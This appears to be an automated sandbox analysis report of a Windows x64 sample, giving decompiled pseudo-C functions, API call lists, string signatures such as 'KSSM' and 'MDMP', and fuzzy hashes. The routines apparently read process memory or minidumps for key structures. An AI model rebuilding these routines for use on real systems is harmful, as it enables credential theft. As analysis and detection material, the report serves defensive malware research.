                                                                                                                                                                                        • Opcode ID: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                                                                                                                                                                        • Instruction ID: 58424369089563c33eaaf5de1acc3127a0fe4fc673582382998477ef75a40482
                                                                                                                                                                                        • Opcode Fuzzy Hash: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 45414136A04B0285EA94EF56F844239A365FBC8FA4F958035CE4E2B354DF3DD849C314
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E00007FF77FF7CEF23074(void* __edx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long __r8, char _a8, long long _a16, long long _a24) {
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				long long _v56;
                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                        				long long _v80;
                                                                                                                                                                                        				void* _v88;
                                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                                        				long long _v120;
                                                                                                                                                                                        				long long _t86;
                                                                                                                                                                                        				long long _t89;
                                                                                                                                                                                        				void* _t116;
                                                                                                                                                                                        				intOrPtr* _t118;
                                                                                                                                                                                        				long long _t128;
                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                        				long long _t131;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t124 = __r8;
                                                                                                                                                                                        				_t89 = __rbx;
                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                        				_a24 = __rsi;
                                                                                                                                                                                        				_t131 = __r8;
                                                                                                                                                                                        				_t118 = __rcx;
                                                                                                                                                                                        				_v88 = __rcx;
                                                                                                                                                                                        				_v80 = 0xcef30618;
                                                                                                                                                                                        				_t6 = _t116 + 0x40; // 0x40
                                                                                                                                                                                        				r12d = _t6;
                                                                                                                                                                                        				if ( *((intOrPtr*)(__rdx + 8)) - 0x1f40 >= 0) goto 0xcef230ba;
                                                                                                                                                                                        				_t8 = _t116 + 0x18; // 0x18
                                                                                                                                                                                        				r13d = _t8;
                                                                                                                                                                                        				goto 0xcef230d7;
                                                                                                                                                                                        				if ( *((intOrPtr*)(__rdx + 8)) - 0x24b8 >= 0) goto 0xcef230ce;
                                                                                                                                                                                        				_t10 = _t89 - 8; // 0x28
                                                                                                                                                                                        				r13d = _t10;
                                                                                                                                                                                        				goto 0xcef230d7;
                                                                                                                                                                                        				_t90 = _t128;
                                                                                                                                                                                        				r13d = 0x38;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *0xcef30618();
                                                                                                                                                                                        				if (0xcef30618 == 0) goto 0xcef2324f;
                                                                                                                                                                                        				_t11 =  &_a8; // 0x68
                                                                                                                                                                                        				_t12 =  &_v88; // 0x8
                                                                                                                                                                                        				r8d = 4;
                                                                                                                                                                                        				_v88 = _t11;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t128, _t12, __rcx, __r8) == 0) goto 0xcef23246;
                                                                                                                                                                                        				_t15 =  &_v88; // 0x8
                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                        				_v88 = _t118;
                                                                                                                                                                                        				 *_t118 =  *_t118 + _a8 + 4;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t128, _t15, _t118, _t124) == 0) goto 0xcef23246;
                                                                                                                                                                                        				_t17 =  &_v72; // 0x18
                                                                                                                                                                                        				_t18 =  &_v88; // 0x8
                                                                                                                                                                                        				r8d = 0x20;
                                                                                                                                                                                        				_v88 = _t17;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t90, _t18, _t118, _t124) == 0) goto 0xcef23246;
                                                                                                                                                                                        				if (_v68 != 0x55555552) goto 0xcef23246;
                                                                                                                                                                                        				_t86 = _v56;
                                                                                                                                                                                        				_t22 =  &_v88; // 0x8
                                                                                                                                                                                        				_v88 = 0xcef30618;
                                                                                                                                                                                        				 *_t118 = _t86;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t90, _t22, _t118, _t90) == 0) goto 0xcef23246;
                                                                                                                                                                                        				if ( *0x7FF7CEF3061C != 0x4d53534b) goto 0xcef23246;
                                                                                                                                                                                        				_t130 = r13d;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t86();
                                                                                                                                                                                        				_v88 = _t86;
                                                                                                                                                                                        				if (_t86 == 0) goto 0xcef23246;
                                                                                                                                                                                        				_t29 = _v56 + 4; // 0x2c
                                                                                                                                                                                        				 *_t118 = _t130 + _t29;
                                                                                                                                                                                        				r8d =  *((intOrPtr*)(_t130 + 0xcef30618));
                                                                                                                                                                                        				_t31 =  &_v88; // 0x8
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t90, _t31, _t118, _t90) == 0) goto 0xcef2323c;
                                                                                                                                                                                        				r9d =  *((intOrPtr*)(_t131 + 0x18));
                                                                                                                                                                                        				_v104 = 0;
                                                                                                                                                                                        				_v112 =  *((intOrPtr*)(_t130 + 0xcef30618));
                                                                                                                                                                                        				_v120 = _v88;
                                                                                                                                                                                        				dil =  *0xcef30660() > 0;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}




















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF230DE
                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF230EE
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF231C2
                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF231D2
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF23240
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF23249
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLocalModuleProc
                                                                                                                                                                                        • String ID: KSSM$LocalAlloc$RUUU$kernel32
                                                                                                                                                                                        • API String ID: 1697219777-2069434485
                                                                                                                                                                                        • Opcode ID: ae9309bfe1862c4b675f0d7e7819ae26e40bb70bf768e141a6c32085e0ba48a4
                                                                                                                                                                                        • Instruction ID: ead62bb25d6d8d0e8ae223002fe5546db9e3a7c53729a8d6ea6d800fff1da1d3
                                                                                                                                                                                        • Opcode Fuzzy Hash: ae9309bfe1862c4b675f0d7e7819ae26e40bb70bf768e141a6c32085e0ba48a4
                                                                                                                                                                                        • Instruction Fuzzy Hash: E1518072B15B2386EB94EF61E8849ADB3A8FB44B98F814035DE0D63794EF38D545C720
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                                                                                                                                                                        • String ID: LocalAlloc$MDMP$kernel32
                                                                                                                                                                                        • API String ID: 3734750734-1949004057
                                                                                                                                                                                        • Opcode ID: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                                                                                                                                                                        • Instruction ID: 0a0830d050f1eff4ab948ede62f4dc357809f37b3c54e9276808aa6244be9ee9
                                                                                                                                                                                        • Opcode Fuzzy Hash: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D218F37A08A0282EB90EF25E450229B3A1FBC8FA4B888131CA0D5BB14DF3CE455C714
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26D2A
                                                                                                                                                                                        • malloc.LIBCMT ref: 00007FF7CEF26D93
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26DC7
                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26DEE
                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26E36
                                                                                                                                                                                        • malloc.LIBCMT ref: 00007FF7CEF26E93
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF7CEF28D04
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF28D29
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _callnewh.LIBCMT ref: 00007FF7CEF28D42
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D4D
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D58
                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26EC8
                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26F08
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$_errnomalloc$AllocateHeap_callnewh
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1202131735-0
                                                                                                                                                                                        • Opcode ID: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                                                                                                                                                                        • Instruction ID: e632cc59ba4a5d80a64c2a9ca55acfa2af86ea5880aefa0f9ebc00b70c59d765
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0481D432B08B8286EBA4AF25D44016DB691FF487B8F954235EA1D67BD5DF3CE8008724
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                        			E00007FF77FF7CEF27334(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				intOrPtr* _t38;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				long long _t41;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				signed long long _t50;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t52 = __rsi;
                                                                                                                                                                                        				_t38 = __rax;
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                        				_a24 = __rdi;
                                                                                                                                                                                        				_t40 = __ecx;
                                                                                                                                                                                        				if ( *0xcef2fde0 != 0) goto 0xcef27372;
                                                                                                                                                                                        				E00007FF77FF7CEF25E60();
                                                                                                                                                                                        				_t4 = _t52 + 0x1d; // 0x1e
                                                                                                                                                                                        				E00007FF77FF7CEF25C00(_t4,  *0xcef2fde0, _t40, __rsi, __rbp);
                                                                                                                                                                                        				E00007FF77FF7CEF25850();
                                                                                                                                                                                        				_t50 = _t40 + _t40;
                                                                                                                                                                                        				if ( *((long long*)(0xcef2eb70 + _t50 * 8)) == 0) goto 0xcef2738b;
                                                                                                                                                                                        				goto 0xcef27404;
                                                                                                                                                                                        				E00007FF77FF7CEF274A0(_t40, _t43, _t50, _t52);
                                                                                                                                                                                        				_t41 = _t38;
                                                                                                                                                                                        				if (_t38 != 0) goto 0xcef273ac;
                                                                                                                                                                                        				E00007FF77FF7CEF25798(_t38, _t38);
                                                                                                                                                                                        				 *_t38 = 0xc;
                                                                                                                                                                                        				goto 0xcef27404;
                                                                                                                                                                                        				E00007FF77FF7CEF2741C();
                                                                                                                                                                                        				if ( *((long long*)(0xcef2eb70 + _t50 * 8)) != 0) goto 0xcef273ef;
                                                                                                                                                                                        				if (InitializeCriticalSectionAndSpinCount(??, ??) != 0) goto 0xcef273e8;
                                                                                                                                                                                        				E00007FF77FF7CEF27460(_t38, _t41);
                                                                                                                                                                                        				E00007FF77FF7CEF25798(InitializeCriticalSectionAndSpinCount(??, ??), _t38);
                                                                                                                                                                                        				 *_t38 = 0xc;
                                                                                                                                                                                        				goto 0xcef273f5;
                                                                                                                                                                                        				 *((long long*)(0xcef2eb70 + _t50 * 8)) = _t41;
                                                                                                                                                                                        				goto 0xcef273f5;
                                                                                                                                                                                        				_t23 = E00007FF77FF7CEF27460(_t38, _t41);
                                                                                                                                                                                        				LeaveCriticalSection(??);
                                                                                                                                                                                        				goto 0xcef27387;
                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2923989369-0
                                                                                                                                                                                        • Opcode ID: 47de61ff78552703b8d08027e5de0850e91b74c297a0eae06539bb410adcf6ee
                                                                                                                                                                                        • Instruction ID: b556174c83f7e80bdfc6e86fd02475815f616646547f48a23b8e48389229ec20
                                                                                                                                                                                        • Opcode Fuzzy Hash: 47de61ff78552703b8d08027e5de0850e91b74c297a0eae06539bb410adcf6ee
                                                                                                                                                                                        • Instruction Fuzzy Hash: ED213821E09786C2F6E5BF61A40577EE294EF817B4FD48434E94E666D2CF3CE8508321
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                        			E00007FF77FF7CEF21380(long long __rbx, signed int __rcx, long long __rdx, long long __r8, long long __r11, signed int _a8, void* _a32) {
                                                                                                                                                                                        				long long _v32;
                                                                                                                                                                                        				long long _v40;
                                                                                                                                                                                        				long long _v48;
                                                                                                                                                                                        				long long _v56;
                                                                                                                                                                                        				long long _v64;
                                                                                                                                                                                        				long long _v72;
                                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				long long _t53;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = _t49;
                                                                                                                                                                                        				 *((long long*)(_t30 + 0x20)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t30 + 0x18)) = __r8;
                                                                                                                                                                                        				 *((long long*)(_t30 + 0x10)) = __rdx;
                                                                                                                                                                                        				 *((long long*)(_t30 + 8)) = __rcx;
                                                                                                                                                                                        				r11d = 0;
                                                                                                                                                                                        				_t53 =  *((intOrPtr*)(__r8 + 0x10));
                                                                                                                                                                                        				_v56 = __r11;
                                                                                                                                                                                        				_v48 = 0xcef30618;
                                                                                                                                                                                        				_v40 = _t53;
                                                                                                                                                                                        				_v32 = __r11;
                                                                                                                                                                                        				_v64 =  *((intOrPtr*)(__r8)) + _t53;
                                                                                                                                                                                        				_v72 = _t53;
                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 8)))) != r11d) goto 0xcef213fb;
                                                                                                                                                                                        				_t21 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
                                                                                                                                                                                        				_t27 = _t21;
                                                                                                                                                                                        				if (_t27 == 0) goto 0xcef214e4;
                                                                                                                                                                                        				if (_t27 == 0) goto 0xcef2145e;
                                                                                                                                                                                        				if (_t27 == 0) goto 0xcef2141f;
                                                                                                                                                                                        				if (_t27 == 0) goto 0xcef2145e;
                                                                                                                                                                                        				if (_t21 - 0xffffffffffffffff == 3) goto 0xcef2145e;
                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                        				 *(__r8 + 0x18) = __rcx & _a8;
                                                                                                                                                                                        				return r11d;
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLocalModuleProc
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 1697219777-3502785670
                                                                                                                                                                                        • Opcode ID: 1ced55bf900e1cfc94c77b7a9d4af983030c3a5c5699f4abca498f46f165df9d
                                                                                                                                                                                        • Instruction ID: 0cc67442385b86210a3957718858d93ec9ae1b30594d6917f8d96941ea0bdd81
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ced55bf900e1cfc94c77b7a9d4af983030c3a5c5699f4abca498f46f165df9d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 29515E33B14E5685EB90EF65E8400ADB3B5FB48BA8B994136DE4D63B48DF38D841C364
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E00007FF77FF7CEF23EF8(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, void* _a24, long long _a32) {
                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				long long _v32;
                                                                                                                                                                                        				long long _v40;
                                                                                                                                                                                        				long long _t51;
                                                                                                                                                                                        				long long _t60;
                                                                                                                                                                                        				intOrPtr* _t62;
                                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                        				long long _t78;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t53 = __rbx;
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                        				_a32 = __rdi;
                                                                                                                                                                                        				_t69 = __rcx;
                                                                                                                                                                                        				_v40 =  &_a24;
                                                                                                                                                                                        				_v32 = 0xcef30618;
                                                                                                                                                                                        				_v16 = 0xcef30618;
                                                                                                                                                                                        				_t72 = __rdx;
                                                                                                                                                                                        				_v24 = __rbx;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *0xcef30618();
                                                                                                                                                                                        				_v24 = 0xcef30618;
                                                                                                                                                                                        				if (0xcef30618 == 0) goto 0xcef23fd1;
                                                                                                                                                                                        				_t12 = _t53 + 8; // 0x8
                                                                                                                                                                                        				r8d = _t12;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(__rbx,  &_v40, __rcx, _t78) == 0) goto 0xcef23fc7;
                                                                                                                                                                                        				_t60 = _a24;
                                                                                                                                                                                        				_v40 = _t60;
                                                                                                                                                                                        				_v32 =  *((intOrPtr*)(_t69 + 8));
                                                                                                                                                                                        				if (_t60 ==  *_t69) goto 0xcef23fc7;
                                                                                                                                                                                        				r8d = 0x28;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t53,  &_v24,  &_v40, _t78) == 0) goto 0xcef23fc7;
                                                                                                                                                                                        				_t62 = _v24;
                                                                                                                                                                                        				if ( *_t72 !=  *((intOrPtr*)(_t62 + 0x20))) goto 0xcef23fb3;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t72 + 4)) ==  *((intOrPtr*)(_t62 + 0x24))) goto 0xcef23fc1;
                                                                                                                                                                                        				_t51 =  *_t62;
                                                                                                                                                                                        				_v40 = _t51;
                                                                                                                                                                                        				if (_t51 ==  *_t69) goto 0xcef23fcb;
                                                                                                                                                                                        				goto 0xcef23f89;
                                                                                                                                                                                        				goto 0xcef23fcb;
                                                                                                                                                                                        				return LocalFree(??);
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc$FreeLocal$FileMemoryPointerProcessWrite
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 3690204003-3502785670
                                                                                                                                                                                        • Opcode ID: d8a25563b84a8b8da5a385e77a36fe545e94acd25a0052c9a3bbaf25ed5f8c59
                                                                                                                                                                                        • Instruction ID: e3babd6b485b3331dcefb5ccd1fe29602904fe7d5f1f21a8582139af0285917b
                                                                                                                                                                                        • Opcode Fuzzy Hash: d8a25563b84a8b8da5a385e77a36fe545e94acd25a0052c9a3bbaf25ed5f8c59
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F316D72B05B02C9EB94EF61E8400ACB3B4FB48798B844431DE4D67B58DF78E559C764
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 36%
                                                                                                                                                                                        			E00007FF77FF7CEF23FEE(void* __eax, void* __ebx, void* __ecx, long long __rbx, intOrPtr* __rcx, long long __rdi, void* __rsi, void* __r9, void* _a8, void* _a16) {
                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				long long _v32;
                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        				signed long long _t50;
                                                                                                                                                                                        				WCHAR* _t72;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t71 = __rsi;
                                                                                                                                                                                        				_t81 = _t75;
                                                                                                                                                                                        				 *((long long*)(_t81 + 8)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t81 + 0x10)) = __rdi;
                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                        				_v40 = _v40 & 0x00000000;
                                                                                                                                                                                        				_v16 = 0xcef30618;
                                                                                                                                                                                        				_v32 =  *((intOrPtr*)( *__rcx));
                                                                                                                                                                                        				if ( *0xcef2ef24 != 0) goto 0xcef2406a;
                                                                                                                                                                                        				 *((long long*)(_t81 - 0x38)) = 0xcef306c0;
                                                                                                                                                                                        				 *(_t81 - 0x40) =  *(_t81 - 0x40) & 0x00000000;
                                                                                                                                                                                        				r9d = 3;
                                                                                                                                                                                        				 *((long long*)(_t81 - 0x48)) = 0xcef306b8;
                                                                                                                                                                                        				if (E00007FF77FF7CEF23DA8(__rbx,  *__rcx, 0xcef2ef00, __rcx, __rsi, 0xcef2ef30, __r9, _t81) == 0) goto 0xcef240f4;
                                                                                                                                                                                        				_t50 =  *0xcef306b8; // 0x0
                                                                                                                                                                                        				_t52 =  *0xcef306c0;
                                                                                                                                                                                        				_v40 = _t50;
                                                                                                                                                                                        				E00007FF77FF7CEF23EF8( *0xcef306c0,  &_v40,  *((intOrPtr*)(__rcx + 0x10)), __rcx, _t71);
                                                                                                                                                                                        				_v40 = _t50;
                                                                                                                                                                                        				if (_t50 == 0) goto 0xcef240f4;
                                                                                                                                                                                        				GetModuleHandleW(_t72);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t50();
